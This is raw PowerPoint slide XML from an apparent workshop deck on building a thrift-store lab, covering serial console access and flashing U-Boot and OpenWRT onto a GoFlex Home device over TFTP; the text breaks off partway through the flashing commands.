            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7001934" y="2310968"/>
            <a:ext cx="5034863" cy="2783545"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4072955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2CE3-C2B6-46DB-A13E-693F0B7DA212}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Let’s GO! Installing U-Boot and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>OpenWRT</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C5F421E3-FD44-1089-6CEA-193980771C10}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1825625"/>
            <a:ext cx="5752723" cy="4351338"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>TFTP and Serial – Learning about how IoT works and is designed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Devices are built for ease of maintenance, reliability, servicing in bulk.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Access &amp; recovery is straightforward, not difficult to leverage for serial access for Recovery Booting / Soft Bricking / Side Loading. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>One of the best features of these specific devices is that they’re very flexible / hard to kill!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0F850296-F031-C2FA-F176-DAD38103B647}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="6831687" y="2446038"/>
            <a:ext cx="3923922" cy="2942942"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3263252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5E2B-B8F4-B908-2A84-669FD2CA7598}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>FTDI / Serial Cable</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Content Placeholder 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{564B73A7-146F-C89C-2F48-5D71560EBC96}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="7463121" y="1572022"/>
            <a:ext cx="4352925" cy="3264693"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C15791D1-588A-3186-0E86-D5600F286F5C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="4687971" y="3476266"/>
            <a:ext cx="3699881" cy="2774911"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{601578C3-A94D-7E89-234C-9A2F668490B1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="656801" y="1690688"/>
            <a:ext cx="4250700" cy="3139321"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>You may have an FTDI *or* a Serial cable. MAKE SURE TO CHECK!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Open it and identify the  TX / RX / GND wires. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>They are also typically labeled on the ends.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Do not proceed yet.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Arrow: Right 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C0584DF1-20CC-D860-BAA3-1F95A35309AA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4019413" y="5380831"/>
            <a:ext cx="2355073" cy="70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06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aceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="553155" y="3317644"/>
            <a:ext cx="11027465" cy="3040303"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:normAutofit fontScale="85000" lnSpcReduction="19999"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="522461" indent="-391846">
              <a:spcBef>
                <a:spcPts val="1714"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="45000"/>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3870">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>$50 Laptop</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="522461" indent="-391846">
              <a:spcBef>
                <a:spcPts val="1714"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="45000"/>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3870">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>$15 Ethernet HUB</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="522461" indent="-391846">
              <a:spcBef>
                <a:spcPts val="1714"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="45000"/>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3870">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>$7.50 2GB Personal Cloud</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="522461" indent="-391846">
              <a:spcBef>
                <a:spcPts val="1714"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="45000"/>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3870">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>$10 Cisco Catalyst 2950 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="522461" indent="-391846">
              <a:spcBef>
                <a:spcPts val="1714"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="45000"/>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3870">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>$15 Cisco 3250</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="641103" y="591184"/>
            <a:ext cx="10969994" cy="1637628"/>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Build an Exploitation Lab from equipment found at the Thrift Store?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="19" name="Picture 18"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="5407200">
            <a:off x="7899428" y="3443906"/>
            <a:ext cx="1619202" cy="5249453"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="20" name="Picture 19"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3594328" y="2370243"/>
            <a:ext cx="5168471" cy="1500341"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="21" name="Picture 20"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9123735" y="2211762"/>
            <a:ext cx="2285778" cy="2797793"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>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524C-1003-EA04-88B3-0C93AA68E52D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Use these Pins (Serial) – 115200 8-n-1 </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DC956685-F51D-9AF4-00A7-243FC67FCD3C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1825625"/>
            <a:ext cx="5653135" cy="4351338"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="70000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The boards have a SERIAL connection / header available without pins.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This allows direct console access, firmware flashing &amp; recovering, replacement of bootloader, access to the operating system.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>“Which pins do I use?”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Good question, this is part of the adventure*. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Don’t hook anything up, examine the picture here. (Hint: Black is GND.)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>Only concern yourself with those pins in that orientation.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>*One of the things you will have to become comfortable with is finding the answer to this question. This is not made “easy” for a reason.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ABBE4D84-F0D6-A255-65B0-DE016E6ADD2C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7146651" y="1825625"/>
            <a:ext cx="5124471" cy="3640294"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="896523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67B4-A8C9-4A87-9683-C272BECA21E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Install U-Boot</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Content Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1FD2E702-5F2D-B814-5EA9-A99B9C4F6A0B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6561768" y="147034"/>
            <a:ext cx="1645946" cy="1843776"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D1675810-85D0-6697-ABE8-15EE8F9D9C2D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1249378" y="1810693"/>
            <a:ext cx="6671057" cy="1200329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Download the python TFTP Server script or use your own TFTP server.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Run it using –create-config.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Edit the FILE for the correct TFTP file.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B744D8F5-CEBE-4BC1-41F8-7C9C68658EF2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1249378" y="2605166"/>
            <a:ext cx="6411435" cy="1754326"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Boot the device, interrupt the bootloader.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>Type PRINTENV and take a screenshot before changing anything!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If you make a mistake, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>setenv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (mistake) removes it.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>DO NOT REBOOT IT. – Use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>saveenv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> to save!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9390959E-D02A-CA23-8B7B-1AAD0A1AC9DE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="52053" y="3846979"/>
            <a:ext cx="6067425" cy="2867025"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="Picture 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D200CFA8-BB5E-A95E-994C-4792F5565A9B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8204113" y="108897"/>
            <a:ext cx="3225727" cy="4568358"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="TextBox 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9212F3E4-C1B8-5267-F6E0-A2ADE2537BF2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7116066" y="4866895"/>
            <a:ext cx="4101220" cy="1754326"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Command / Flashing Syntax:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>GoFlexHome</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>setenv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ipaddr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (device </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>GoFlexHome</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>setenv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>serverip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
